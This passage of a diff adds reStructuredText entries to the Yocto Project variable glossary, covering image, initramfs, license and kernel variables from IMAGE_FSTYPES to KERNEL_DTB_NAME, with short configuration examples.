+      For an example that shows how to customize your image by using this
+      variable, see the ":ref:`usingpoky-extend-customimage-imagefeatures`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`IMAGE_FSTYPES`
+      Specifies the formats the OpenEmbedded build system uses during the
+      build when creating the root filesystem. For example, setting
+      ``IMAGE_FSTYPES`` as follows causes the build system to create root
+      filesystems using two formats: ``.ext3`` and ``.tar.bz2``:
+      ::
+
+         IMAGE_FSTYPES = "ext3 tar.bz2"
+
+      For the complete list of supported image formats from which you can
+      choose, see :term:`IMAGE_TYPES`.
+
+      .. note::
+
+         -  If an image recipe uses the "inherit image" line and you are
+            setting ``IMAGE_FSTYPES`` inside the recipe, you must set
+            ``IMAGE_FSTYPES`` prior to using the "inherit image" line.
+
+         -  Due to the way the OpenEmbedded build system processes this
+            variable, you cannot update its contents by using ``_append``
+            or ``_prepend``. You must use the ``+=`` operator to add one or
+            more options to the ``IMAGE_FSTYPES`` variable.
+
+   :term:`IMAGE_INSTALL`
+      Used by recipes to specify the packages to install into an image
+      through the :ref:`image <ref-classes-image>` class. Use the
+      ``IMAGE_INSTALL`` variable with care to avoid ordering issues.
+
+      Image recipes set ``IMAGE_INSTALL`` to specify the packages to
+      install into an image through ``image.bbclass``. Additionally,
+      "helper" classes such as the
+      :ref:`core-image <ref-classes-core-image>` class exist that can
+      take lists used with ``IMAGE_FEATURES`` and turn them into
+      auto-generated entries in ``IMAGE_INSTALL`` in addition to its
+      default contents.
+
+      When you use this variable, it is best to use it as follows:
+      ::
+
+         IMAGE_INSTALL_append = " package-name"
+
+      Be sure to include the space
+      between the quotation character and the start of the package name or
+      names.
+
+      .. note::
+
+         -  When working with a
+            :ref:`core-image-minimal-initramfs <ref-manual/ref-images:images>`
+            image, do not use the ``IMAGE_INSTALL`` variable to specify
+            packages for installation. Instead, use the
+            :term:`PACKAGE_INSTALL` variable, which
+            allows the initial RAM filesystem (initramfs) recipe to use a
+            fixed set of packages and not be affected by ``IMAGE_INSTALL``.
+            For information on creating an initramfs, see the
+            ":ref:`building-an-initramfs-image`"
+            section in the Yocto Project Development Tasks Manual.
+
+         -  Using ``IMAGE_INSTALL`` with the
+            :ref:`+= <bitbake:appending-and-prepending>`
+            BitBake operator within the ``/conf/local.conf`` file or from
+            within an image recipe is not recommended. Use of this operator
+            in these ways can cause ordering issues. Since
+            ``core-image.bbclass`` sets ``IMAGE_INSTALL`` to a default
+            value using the
+            :ref:`?= <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:setting a default value (?=)>`
+            operator, using a ``+=`` operation against ``IMAGE_INSTALL``
+            results in unexpected behavior when used within
+            ``conf/local.conf``. Furthermore, the same operation from
+            within an image recipe may or may not succeed depending on the
+            specific situation. In both these cases, the behavior is
+            contrary to how most users expect the ``+=`` operator to work.
+
+   :term:`IMAGE_LINGUAS`
+      Specifies the list of locales to install into the image during the
+      root filesystem construction process. The OpenEmbedded build system
+      automatically splits locale files, which are used for localization,
+      into separate packages. Setting the ``IMAGE_LINGUAS`` variable
+      ensures that any locale packages that correspond to packages already
+      selected for installation into the image are also installed. Here is
+      an example:
+      ::
+
+         IMAGE_LINGUAS = "pt-br de-de"
+
+      In this example, the build system ensures any Brazilian Portuguese
+      and German locale files that correspond to packages in the image are
+      installed (i.e. ``*-locale-pt-br`` and ``*-locale-de-de`` as well as
+      ``*-locale-pt`` and ``*-locale-de``, since some software packages
+      only provide locale files by language and not by country-specific
+      language).
+
+      See the :term:`GLIBC_GENERATE_LOCALES`
+      variable for information on generating GLIBC locales.
+
+
+   :term:`IMAGE_LINK_NAME`
+      The name of the output image symlink (which does not include
+      the version part as :term:`IMAGE_NAME` does). The default value
+      is derived using the :term:`IMAGE_BASENAME` and :term:`MACHINE`
+      variables:
+      ::
+
+         IMAGE_LINK_NAME ?= "${IMAGE_BASENAME}-${MACHINE}"
+
+
+   :term:`IMAGE_MANIFEST`
+      The manifest file for the image. This file lists all the installed
+      packages that make up the image. The file contains package
+      information on a line-per-package basis as follows:
+      ::
+
+          packagename packagearch version
+
+      The :ref:`image <ref-classes-image>` class defines the manifest
+      file as follows:
+      ::
+
+         IMAGE_MANIFEST ="${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}.rootfs.manifest"
+
+      The location is
+      derived using the :term:`DEPLOY_DIR_IMAGE`
+      and :term:`IMAGE_NAME` variables. You can find
+      information on how the image is created in the ":ref:`image-generation-dev-environment`"
+      section in the Yocto Project Overview and Concepts Manual.
+
+   :term:`IMAGE_NAME`
+      The name of the output image files minus the extension. This variable
+      is derived using the :term:`IMAGE_BASENAME`,
+      :term:`MACHINE`, and :term:`IMAGE_VERSION_SUFFIX`
+      variables:
+      ::
+
+         IMAGE_NAME ?= "${IMAGE_BASENAME}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+   :term:`IMAGE_NAME_SUFFIX`
+      Suffix used for the image output file name - defaults to ``".rootfs"``
+      to distinguish the image file from other files created during image
+      building; however if this suffix is redundant or not desired you can
+      clear the value of this variable (set the value to ""). For example,
+      this is typically cleared in initramfs image recipes.
+
+   :term:`IMAGE_OVERHEAD_FACTOR`
+      Defines a multiplier that the build system applies to the initial
+      image size for cases when the multiplier times the returned disk
+      usage value for the image is greater than the sum of
+      ``IMAGE_ROOTFS_SIZE`` and ``IMAGE_ROOTFS_EXTRA_SPACE``. The result of
+      the multiplier applied to the initial image size creates free disk
+      space in the image as overhead. By default, the build process uses a
+      multiplier of 1.3 for this variable. This default value results in
+      30% free disk space added to the image when this method is used to
+      determine the final generated image size. You should be aware that
+      post install scripts and the package management system uses disk
+      space inside this overhead area. Consequently, the multiplier does
+      not produce an image with all the theoretical free disk space. See
+      ``IMAGE_ROOTFS_SIZE`` for information on how the build system
+      determines the overall image size.
+
+      The default 30% free disk space typically gives the image enough room
+      to boot and allows for basic post installs while still leaving a
+      small amount of free disk space. If 30% free space is inadequate, you
+      can increase the default value. For example, the following setting
+      gives you 50% free space added to the image:
+      ::
+
+         IMAGE_OVERHEAD_FACTOR = "1.5"
+
+      Alternatively, you can ensure a specific amount of free disk space is
+      added to the image by using the ``IMAGE_ROOTFS_EXTRA_SPACE``
+      variable.
+
+   :term:`IMAGE_PKGTYPE`
+      Defines the package type (i.e. DEB, RPM, IPK, or TAR) used by the
+      OpenEmbedded build system. The variable is defined appropriately by
+      the :ref:`package_deb <ref-classes-package_deb>`,
+      :ref:`package_rpm <ref-classes-package_rpm>`,
+      :ref:`package_ipk <ref-classes-package_ipk>`, or
+      :ref:`package_tar <ref-classes-package_tar>` class.
+
+      .. note::
+
+         The ``package_tar`` class is broken and is not supported. It is
+         recommended that you do not use it.
+
+      The :ref:`populate_sdk_* <ref-classes-populate-sdk-*>` and
+      :ref:`image <ref-classes-image>` classes use the ``IMAGE_PKGTYPE``
+      for packaging up images and SDKs.
+
+      You should not set the ``IMAGE_PKGTYPE`` manually. Rather, the
+      variable is set indirectly through the appropriate
+      :ref:`package_* <ref-classes-package>` class using the
+      :term:`PACKAGE_CLASSES` variable. The
+      OpenEmbedded build system uses the first package type (e.g. DEB, RPM,
+      or IPK) that appears with the variable
+
+      .. note::
+
+         Files using the ``.tar`` format are never used as a substitute
+         packaging format for DEB, RPM, and IPK formatted files for your image
+         or SDK.
+
+   :term:`IMAGE_POSTPROCESS_COMMAND`
+      Specifies a list of functions to call once the OpenEmbedded build
+      system creates the final image output files. You can specify
+      functions separated by semicolons:
+      ::
+
+         IMAGE_POSTPROCESS_COMMAND += "function; ... "
+
+      If you need to pass the root filesystem path to a command within the
+      function, you can use ``${IMAGE_ROOTFS}``, which points to the
+      directory that becomes the root filesystem image. See the
+      :term:`IMAGE_ROOTFS` variable for more
+      information.
+
+   :term:`IMAGE_PREPROCESS_COMMAND`
+      Specifies a list of functions to call before the OpenEmbedded build
+      system creates the final image output files. You can specify
+      functions separated by semicolons:
+      ::
+
+         IMAGE_PREPROCESS_COMMAND += "function; ... "
+
+      If you need to pass the root filesystem path to a command within the
+      function, you can use ``${IMAGE_ROOTFS}``, which points to the
+      directory that becomes the root filesystem image. See the
+      :term:`IMAGE_ROOTFS` variable for more
+      information.
+
+   :term:`IMAGE_ROOTFS`
+      The location of the root filesystem while it is under construction
+      (i.e. during the :ref:`ref-tasks-rootfs` task). This
+      variable is not configurable. Do not change it.
+
+   :term:`IMAGE_ROOTFS_ALIGNMENT`
+      Specifies the alignment for the output image file in Kbytes. If the
+      size of the image is not a multiple of this value, then the size is
+      rounded up to the nearest multiple of the value. The default value is
+      "1". See :term:`IMAGE_ROOTFS_SIZE` for
+      additional information.
+
+   :term:`IMAGE_ROOTFS_EXTRA_SPACE`
+      Defines additional free disk space created in the image in Kbytes. By
+      default, this variable is set to "0". This free disk space is added
+      to the image after the build system determines the image size as
+      described in ``IMAGE_ROOTFS_SIZE``.
+
+      This variable is particularly useful when you want to ensure that a
+      specific amount of free disk space is available on a device after an
+      image is installed and running. For example, to be sure 5 Gbytes of
+      free disk space is available, set the variable as follows:
+      ::
+
+         IMAGE_ROOTFS_EXTRA_SPACE = "5242880"
+
+      For example, the Yocto Project Build Appliance specifically requests
+      40 Gbytes of extra space with the line:
+      ::
+
+         IMAGE_ROOTFS_EXTRA_SPACE = "41943040"
+
+   :term:`IMAGE_ROOTFS_SIZE`
+      Defines the size in Kbytes for the generated image. The OpenEmbedded
+      build system determines the final size for the generated image using
+      an algorithm that takes into account the initial disk space used for
+      the generated image, a requested size for the image, and requested
+      additional free disk space to be added to the image. Programatically,
+      the build system determines the final size of the generated image as
+      follows:
+      ::
+
+         if (image-du * overhead) < rootfs-size:
+             internal-rootfs-size = rootfs-size + xspace
+         else:
+             internal-rootfs-size = (image-du * overhead) + xspace
+         where:
+             image-du = Returned value of the du command on the image.
+             overhead = IMAGE_OVERHEAD_FACTOR
+             rootfs-size = IMAGE_ROOTFS_SIZE
+             internal-rootfs-size = Initial root filesystem size before any modifications.
+             xspace = IMAGE_ROOTFS_EXTRA_SPACE
+
+      See the :term:`IMAGE_OVERHEAD_FACTOR`
+      and :term:`IMAGE_ROOTFS_EXTRA_SPACE`
+      variables for related information.
+
+   :term:`IMAGE_TYPEDEP`
+      Specifies a dependency from one image type on another. Here is an
+      example from the :ref:`image-live <ref-classes-image-live>` class:
+      ::
+
+         IMAGE_TYPEDEP_live = "ext3"
+
+      In the previous example, the variable ensures that when "live" is
+      listed with the :term:`IMAGE_FSTYPES` variable,
+      the OpenEmbedded build system produces an ``ext3`` image first since
+      one of the components of the live image is an ``ext3`` formatted
+      partition containing the root filesystem.
+
+   :term:`IMAGE_TYPES`
+      Specifies the complete list of supported image types by default:
+
+      - btrfs
+      - container
+      - cpio
+      - cpio.gz
+      - cpio.lz4
+      - cpio.lzma
+      - cpio.xz
+      - cramfs
+      - ext2
+      - ext2.bz2
+      - ext2.gz
+      - ext2.lzma
+      - ext3
+      - ext3.gz
+      - ext4
+      - ext4.gz
+      - f2fs
+      - hddimg
+      - iso
+      - jffs2
+      - jffs2.sum
+      - multiubi
+      - squashfs
+      - squashfs-lz4
+      - squashfs-lzo
+      - squashfs-xz
+      - tar
+      - tar.bz2
+      - tar.gz
+      - tar.lz4
+      - tar.xz
+      - tar.zst
+      - ubi
+      - ubifs
+      - wic
+      - wic.bz2
+      - wic.gz
+      - wic.lzma
+
+      For more information about these types of images, see
+      ``meta/classes/image_types*.bbclass`` in the :term:`Source Directory`.
+
+   :term:`IMAGE_VERSION_SUFFIX`
+      Version suffix that is part of the default :term:`IMAGE_NAME` and
+      :term:`KERNEL_ARTIFACT_NAME` values.
+      Defaults to ``"-${DATETIME}"``, however you could set this to a
+      version string that comes from your external build environment if
+      desired, and this suffix would then be used consistently across
+      the build artifacts.
+
+   :term:`INC_PR`
+      Helps define the recipe revision for recipes that share a common
+      ``include`` file. You can think of this variable as part of the
+      recipe revision as set from within an include file.
+
+      Suppose, for example, you have a set of recipes that are used across
+      several projects. And, within each of those recipes the revision (its
+      :term:`PR` value) is set accordingly. In this case, when
+      the revision of those recipes changes, the burden is on you to find
+      all those recipes and be sure that they get changed to reflect the
+      updated version of the recipe. In this scenario, it can get
+      complicated when recipes that are used in many places and provide
+      common functionality are upgraded to a new revision.
+
+      A more efficient way of dealing with this situation is to set the
+      ``INC_PR`` variable inside the ``include`` files that the recipes
+      share and then expand the ``INC_PR`` variable within the recipes to
+      help define the recipe revision.
+
+      The following provides an example that shows how to use the
+      ``INC_PR`` variable given a common ``include`` file that defines the
+      variable. Once the variable is defined in the ``include`` file, you
+      can use the variable to set the ``PR`` values in each recipe. You
+      will notice that when you set a recipe's ``PR`` you can provide more
+      granular revisioning by appending values to the ``INC_PR`` variable:
+      ::
+
+         recipes-graphics/xorg-font/xorg-font-common.inc:INC_PR = "r2"
+         recipes-graphics/xorg-font/encodings_1.0.4.bb:PR = "${INC_PR}.1"
+         recipes-graphics/xorg-font/font-util_1.3.0.bb:PR = "${INC_PR}.0"
+         recipes-graphics/xorg-font/font-alias_1.0.3.bb:PR = "${INC_PR}.3"
+
+      The
+      first line of the example establishes the baseline revision to be
+      used for all recipes that use the ``include`` file. The remaining
+      lines in the example are from individual recipes and show how the
+      ``PR`` value is set.
+
+   :term:`INCOMPATIBLE_LICENSE`
+      Specifies a space-separated list of license names (as they would
+      appear in :term:`LICENSE`) that should be excluded
+      from the build (if set globally), or from an image (if set locally
+      in an image recipe).
+
+      When the variable is set globally, recipes that provide no alternatives to listed
+      incompatible licenses are not built. Packages that are individually
+      licensed with the specified incompatible licenses will be deleted.
+      Most of the time this does not allow a feasible build (because it becomes impossible
+      to satisfy build time dependencies), so the recommended way to
+      implement license restrictions is to set the variable in specific
+      image recipes where the restrictions must apply. That way there
+      are no build time restrictions, but the license check is still
+      performed when the image's filesystem is assembled from packages.
+
+      .. note::
+
+         This functionality is only regularly tested using the following
+         setting:
+         ::
+
+                 INCOMPATIBLE_LICENSE = "GPL-3.0 LGPL-3.0 AGPL-3.0"
+
+
+         Although you can use other settings, you might be required to
+         remove dependencies on or provide alternatives to components that
+         are required to produce a functional system image.
+
+      .. note::
+
+         It is possible to define a list of licenses that are allowed to be
+         used instead of the licenses that are excluded. To do this, define
+         a variable ``COMPATIBLE_LICENSES`` with the names of the licences
+         that are allowed. Then define ``INCOMPATIBLE_LICENSE`` as:
+         ::
+
+                 INCOMPATIBLE_LICENSE = "${@' '.join(sorted(set(d.getVar('AVAILABLE_LICENSES').split()) - set(d.getVar('COMPATIBLE_LICENSES').split())))}"
+
+
+         This will result in ``INCOMPATIBLE_LICENSE`` containing the names of
+         all licences from :term:`AVAILABLE_LICENSES` except the ones specified
+         in ``COMPATIBLE_LICENSES`` , thus only allowing the latter licences to
+         be used.
+
+   :term:`INHERIT`
+      Causes the named class or classes to be inherited globally. Anonymous
+      functions in the class or classes are not executed for the base
+      configuration and in each individual recipe. The OpenEmbedded build
+      system ignores changes to ``INHERIT`` in individual recipes.
+
+      For more information on ``INHERIT``, see the
+      :ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:\`\`inherit\`\` configuration directive`"
+      section in the Bitbake User Manual.
+
+   :term:`INHERIT_DISTRO`
+      Lists classes that will be inherited at the distribution level. It is
+      unlikely that you want to edit this variable.
+
+      The default value of the variable is set as follows in the
+      ``meta/conf/distro/defaultsetup.conf`` file:
+      ::
+
+         INHERIT_DISTRO ?= "debian devshell sstate license"
+
+   :term:`INHIBIT_DEFAULT_DEPS`
+      Prevents the default dependencies, namely the C compiler and standard
+      C library (libc), from being added to :term:`DEPENDS`.
+      This variable is usually used within recipes that do not require any
+      compilation using the C compiler.
+
+      Set the variable to "1" to prevent the default dependencies from
+      being added.
+
+   :term:`INHIBIT_PACKAGE_DEBUG_SPLIT`
+      Prevents the OpenEmbedded build system from splitting out debug
+      information during packaging. By default, the build system splits out
+      debugging information during the
+      :ref:`ref-tasks-package` task. For more information on
+      how debug information is split out, see the
+      :term:`PACKAGE_DEBUG_SPLIT_STYLE`
+      variable.
+
+      To prevent the build system from splitting out debug information
+      during packaging, set the ``INHIBIT_PACKAGE_DEBUG_SPLIT`` variable as
+      follows:
+      ::
+
+         INHIBIT_PACKAGE_DEBUG_SPLIT = "1"
+
+   :term:`INHIBIT_PACKAGE_STRIP`
+      If set to "1", causes the build to not strip binaries in resulting
+      packages and prevents the ``-dbg`` package from containing the source
+      files.
+
+      By default, the OpenEmbedded build system strips binaries and puts
+      the debugging symbols into ``${``\ :term:`PN`\ ``}-dbg``.
+      Consequently, you should not set ``INHIBIT_PACKAGE_STRIP`` when you
+      plan to debug in general.
+
+   :term:`INHIBIT_SYSROOT_STRIP`
+      If set to "1", causes the build to not strip binaries in the
+      resulting sysroot.
+
+      By default, the OpenEmbedded build system strips binaries in the
+      resulting sysroot. When you specifically set the
+      ``INHIBIT_SYSROOT_STRIP`` variable to "1" in your recipe, you inhibit
+      this stripping.
+
+      If you want to use this variable, include the
+      :ref:`staging <ref-classes-staging>` class. This class uses a
+      ``sys_strip()`` function to test for the variable and acts
+      accordingly.
+
+      .. note::
+
+         Use of the ``INHIBIT_SYSROOT_STRIP`` variable occurs in rare and
+         special circumstances. For example, suppose you are building
+         bare-metal firmware by using an external GCC toolchain. Furthermore,
+         even if the toolchain's binaries are strippable, other files exist
+         that are needed for the build that are not strippable.
+
+   :term:`INITRAMFS_FSTYPES`
+      Defines the format for the output image of an initial RAM filesystem
+      (initramfs), which is used during boot. Supported formats are the
+      same as those supported by the
+      :term:`IMAGE_FSTYPES` variable.
+
+      The default value of this variable, which is set in the
+      ``meta/conf/bitbake.conf`` configuration file in the
+      :term:`Source Directory`, is "cpio.gz". The Linux kernel's
+      initramfs mechanism, as opposed to the initial RAM filesystem
+      `initrd <https://en.wikipedia.org/wiki/Initrd>`__ mechanism, expects
+      an optionally compressed cpio archive.
+
+   :term:`INITRAMFS_IMAGE`
+      Specifies the :term:`PROVIDES` name of an image
+      recipe that is used to build an initial RAM filesystem (initramfs)
+      image. In other words, the ``INITRAMFS_IMAGE`` variable causes an
+      additional recipe to be built as a dependency to whatever root
+      filesystem recipe you might be using (e.g. ``core-image-sato``). The
+      initramfs image recipe you provide should set
+      :term:`IMAGE_FSTYPES` to
+      :term:`INITRAMFS_FSTYPES`.
+
+      An initramfs image provides a temporary root filesystem used for
+      early system initialization (e.g. loading of modules needed to locate
+      and mount the "real" root filesystem).
+
+      .. note::
+
+         See the ``meta/recipes-core/images/core-image-minimal-initramfs.bb``
+         recipe in the :term:`Source Directory`
+         for an example initramfs recipe. To select this sample recipe as
+         the one built to provide the initramfs image, set ``INITRAMFS_IMAGE``
+         to "core-image-minimal-initramfs".
+
+      You can also find more information by referencing the
+      ``meta-poky/conf/local.conf.sample.extended`` configuration file in
+      the Source Directory, the :ref:`image <ref-classes-image>` class,
+      and the :ref:`kernel <ref-classes-kernel>` class to see how to use
+      the ``INITRAMFS_IMAGE`` variable.
+
+      If ``INITRAMFS_IMAGE`` is empty, which is the default, then no
+      initramfs image is built.
+
+      For more information, you can also see the
+      :term:`INITRAMFS_IMAGE_BUNDLE`
+      variable, which allows the generated image to be bundled inside the
+      kernel image. Additionally, for information on creating an initramfs
+      image, see the ":ref:`building-an-initramfs-image`" section
+      in the Yocto Project Development Tasks Manual.
+
+   :term:`INITRAMFS_IMAGE_BUNDLE`
+      Controls whether or not the image recipe specified by
+      :term:`INITRAMFS_IMAGE` is run through an
+      extra pass
+      (:ref:`ref-tasks-bundle_initramfs`) during
+      kernel compilation in order to build a single binary that contains
+      both the kernel image and the initial RAM filesystem (initramfs)
+      image. This makes use of the
+      :term:`CONFIG_INITRAMFS_SOURCE` kernel
+      feature.
+
+      .. note::
+
+         Using an extra compilation pass to bundle the initramfs avoids a
+         circular dependency between the kernel recipe and the initramfs
+         recipe should the initramfs include kernel modules. Should that be
+         the case, the initramfs recipe depends on the kernel for the
+         kernel modules, and the kernel depends on the initramfs recipe
+         since the initramfs is bundled inside the kernel image.
+
+      The combined binary is deposited into the ``tmp/deploy`` directory,
+      which is part of the :term:`Build Directory`.
+
+      Setting the variable to "1" in a configuration file causes the
+      OpenEmbedded build system to generate a kernel image with the
+      initramfs specified in ``INITRAMFS_IMAGE`` bundled within:
+      ::
+
+         INITRAMFS_IMAGE_BUNDLE = "1"
+
+      By default, the
+      :ref:`kernel <ref-classes-kernel>` class sets this variable to a
+      null string as follows:
+      ::
+
+         INITRAMFS_IMAGE_BUNDLE ?= ""
+
+      .. note::
+
+         You must set the ``INITRAMFS_IMAGE_BUNDLE`` variable in a
+         configuration file. You cannot set the variable in a recipe file.
+
+      See the
+      :yocto_git:`local.conf.sample.extended </cgit/cgit.cgi/poky/tree/meta-poky/conf/local.conf.sample.extended>`
+      file for additional information. Also, for information on creating an
+      initramfs, see the ":ref:`building-an-initramfs-image`" section
+      in the Yocto Project Development Tasks Manual.
+
+   :term:`INITRAMFS_LINK_NAME`
+      The link name of the initial RAM filesystem image. This variable is
+      set in the ``meta/classes/kernel-artifact-names.bbclass`` file as
+      follows:
+      ::
+
+         INITRAMFS_LINK_NAME ?= "initramfs-${KERNEL_ARTIFACT_LINK_NAME}"
+
+      The value of the
+      ``KERNEL_ARTIFACT_LINK_NAME`` variable, which is set in the same
+      file, has the following value:
+      ::
+
+         KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
+
+      See the :term:`MACHINE` variable for additional
+      information.
+
+   :term:`INITRAMFS_NAME`
+      The base name of the initial RAM filesystem image. This variable is
+      set in the ``meta/classes/kernel-artifact-names.bbclass`` file as
+      follows:
+      ::
+
+         INITRAMFS_NAME ?= "initramfs-${KERNEL_ARTIFACT_NAME}"
+
+      The value of the :term:`KERNEL_ARTIFACT_NAME`
+      variable, which is set in the same file, has the following value:
+      ::
+
+         KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+   :term:`INITRD`
+      Indicates list of filesystem images to concatenate and use as an
+      initial RAM disk (``initrd``).
+
+      The ``INITRD`` variable is an optional variable used with the
+      :ref:`image-live <ref-classes-image-live>` class.
+
+   :term:`INITRD_IMAGE`
+      When building a "live" bootable image (i.e. when
+      :term:`IMAGE_FSTYPES` contains "live"),
+      ``INITRD_IMAGE`` specifies the image recipe that should be built to
+      provide the initial RAM disk image. The default value is
+      "core-image-minimal-initramfs".
+
+      See the :ref:`image-live <ref-classes-image-live>` class for more
+      information.
+
+   :term:`INITSCRIPT_NAME`
+      The filename of the initialization script as installed to
+      ``${sysconfdir}/init.d``.
+
+      This variable is used in recipes when using ``update-rc.d.bbclass``.
+      The variable is mandatory.
+
+   :term:`INITSCRIPT_PACKAGES`
+      A list of the packages that contain initscripts. If multiple packages
+      are specified, you need to append the package name to the other
+      ``INITSCRIPT_*`` as an override.
+
+      This variable is used in recipes when using ``update-rc.d.bbclass``.
+      The variable is optional and defaults to the :term:`PN`
+      variable.
+
+   :term:`INITSCRIPT_PARAMS`
+      Specifies the options to pass to ``update-rc.d``. Here is an example:
+      ::
+
+         INITSCRIPT_PARAMS = "start 99 5 2 . stop 20 0 1 6 ."
+
+      In this example, the script has a runlevel of 99, starts the script
+      in initlevels 2 and 5, and stops the script in levels 0, 1 and 6.
+
+      The variable's default value is "defaults", which is set in the
+      :ref:`update-rc.d <ref-classes-update-rc.d>` class.
+
+      The value in ``INITSCRIPT_PARAMS`` is passed through to the
+      ``update-rc.d`` command. For more information on valid parameters,
+      please see the ``update-rc.d`` manual page at
+      https://manpages.debian.org/buster/init-system-helpers/update-rc.d.8.en.html
+
+   :term:`INSANE_SKIP`
+      Specifies the QA checks to skip for a specific package within a
+      recipe. For example, to skip the check for symbolic link ``.so``
+      files in the main package of a recipe, add the following to the
+      recipe. The package name override must be used, which in this example
+      is ``${PN}``:
+      ::
+
+         INSANE_SKIP_${PN} += "dev-so"
+
+      See the ":ref:`insane.bbclass <ref-classes-insane>`" section for a
+      list of the valid QA checks you can specify using this variable.
+
+   :term:`INSTALL_TIMEZONE_FILE`
+      By default, the ``tzdata`` recipe packages an ``/etc/timezone`` file.
+      Set the ``INSTALL_TIMEZONE_FILE`` variable to "0" at the
+      configuration level to disable this behavior.
+
+   :term:`IPK_FEED_URIS`
+      When the IPK backend is in use and package management is enabled on
+      the target, you can use this variable to set up ``opkg`` in the
+      target image to point to package feeds on a nominated server. Once
+      the feed is established, you can perform installations or upgrades
+      using the package manager at runtime.
+
+   :term:`KARCH`
+      Defines the kernel architecture used when assembling the
+      configuration. Architectures supported for this release are:
+
+      - powerpc
+      - i386
+      - x86_64
+      - arm
+      - qemu
+      - mips
+
+      You define the ``KARCH`` variable in the :ref:`kernel-dev/kernel-dev-advanced:bsp descriptions`.
+
+   :term:`KBRANCH`
+      A regular expression used by the build process to explicitly identify
+      the kernel branch that is validated, patched, and configured during a
+      build. You must set this variable to ensure the exact kernel branch
+      you want is being used by the build process.
+
+      Values for this variable are set in the kernel's recipe file and the
+      kernel's append file. For example, if you are using the
+      ``linux-yocto_4.12`` kernel, the kernel recipe file is the
+      ``meta/recipes-kernel/linux/linux-yocto_4.12.bb`` file. ``KBRANCH``
+      is set as follows in that kernel recipe file:
+      ::
+
+         KBRANCH ?= "standard/base"
+
+      This variable is also used from the kernel's append file to identify
+      the kernel branch specific to a particular machine or target
+      hardware. Continuing with the previous kernel example, the kernel's
+      append file (i.e. ``linux-yocto_4.12.bbappend``) is located in the
+      BSP layer for a given machine. For example, the append file for the
+      Beaglebone, EdgeRouter, and generic versions of both 32 and 64-bit IA
+      machines (``meta-yocto-bsp``) is named
+      ``meta-yocto-bsp/recipes-kernel/linux/linux-yocto_4.12.bbappend``.
+      Here are the related statements from that append file:
+      ::
+
+         KBRANCH_genericx86 = "standard/base"
+         KBRANCH_genericx86-64 = "standard/base"
+         KBRANCH_edgerouter = "standard/edgerouter"
+         KBRANCH_beaglebone = "standard/beaglebone"
+
+      The ``KBRANCH`` statements
+      identify the kernel branch to use when building for each supported
+      BSP.
+
+   :term:`KBUILD_DEFCONFIG`
+      When used with the :ref:`kernel-yocto <ref-classes-kernel-yocto>`
+      class, specifies an "in-tree" kernel configuration file for use
+      during a kernel build.
+
+      Typically, when using a ``defconfig`` to configure a kernel during a
+      build, you place the file in your layer in the same manner as you
+      would place patch files and configuration fragment files (i.e.
+      "out-of-tree"). However, if you want to use a ``defconfig`` file that
+      is part of the kernel tree (i.e. "in-tree"), you can use the
+      ``KBUILD_DEFCONFIG`` variable and append the
+      :term:`KMACHINE` variable to point to the
+      ``defconfig`` file.
+
+      To use the variable, set it in the append file for your kernel recipe
+      using the following form:
+      ::
+
+         KBUILD_DEFCONFIG_KMACHINE ?= defconfig_file
+
+      Here is an example from a "raspberrypi2" ``KMACHINE`` build that uses
+      a ``defconfig`` file named "bcm2709_defconfig":
+      ::
+
+         KBUILD_DEFCONFIG_raspberrypi2 = "bcm2709_defconfig"
+
+      As an alternative, you can use the following within your append file:
+      ::
+
+         KBUILD_DEFCONFIG_pn-linux-yocto ?= defconfig_file
+
+      For more
+      information on how to use the ``KBUILD_DEFCONFIG`` variable, see the
+      ":ref:`kernel-dev/kernel-dev-common:using an "in-tree" \`\`defconfig\`\` file`"
+      section in the Yocto Project Linux Kernel Development Manual.
+
+   :term:`KERNEL_ALT_IMAGETYPE`
+      Specifies an alternate kernel image type for creation in addition to
+      the kernel image type specified using the
+      :term:`KERNEL_IMAGETYPE` variable.
+
+   :term:`KERNEL_ARTIFACT_NAME`
+      Specifies the name of all of the build artifacts. You can change the
+      name of the artifacts by changing the ``KERNEL_ARTIFACT_NAME``
+      variable.
+
+      The value of ``KERNEL_ARTIFACT_NAME``, which is set in the
+      ``meta/classes/kernel-artifact-names.bbclass`` file, has the
+      following default value:
+      ::
+
+         KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+      See the :term:`PKGE`, :term:`PKGV`, :term:`PKGR`, :term:`MACHINE`
+      and :term:`IMAGE_VERSION_SUFFIX` variables for additional information.
+
+   :term:`KERNEL_CLASSES`
+      A list of classes defining kernel image types that the
+      :ref:`kernel <ref-classes-kernel>` class should inherit. You
+      typically append this variable to enable extended image types. An
+      example is the "kernel-fitimage", which enables fitImage support and
+      resides in ``meta/classes/kernel-fitimage.bbclass``. You can register
+      custom kernel image types with the ``kernel`` class using this
+      variable.
+
+   :term:`KERNEL_DEVICETREE`
+      Specifies the name of the generated Linux kernel device tree (i.e.
+      the ``.dtb``) file.
+
+      .. note::
+
+         Legacy support exists for specifying the full path to the device
+         tree. However, providing just the ``.dtb`` file is preferred.
+
+      In order to use this variable, the
+      :ref:`kernel-devicetree <ref-classes-kernel-devicetree>` class must
+      be inherited.
+
+   :term:`KERNEL_DTB_LINK_NAME`
+      The link name of the kernel device tree binary (DTB). This variable
+      is set in the ``meta/classes/kernel-artifact-names.bbclass`` file as
+      follows:
+      ::
+
+         KERNEL_DTB_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
+
+      The
+      value of the ``KERNEL_ARTIFACT_LINK_NAME`` variable, which is set in
+      the same file, has the following value:
+      ::
+
+         KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
+
+      See the :term:`MACHINE` variable for additional
+      information.
+
+   :term:`KERNEL_DTB_NAME`
+      The base name of the kernel device tree binary (DTB). This variable
+      is set in the ``meta/classes/kernel-artifact-names.bbclass`` file as
+      follows:
+      ::
+
+         KERNEL_DTB_NAME ?= "${KERNEL_ARTIFACT_NAME}"
+
+      The value of the :term:`KERNEL_ARTIFACT_NAME`
+      variable, which is set in the same file, has the following value:
+      ::
+
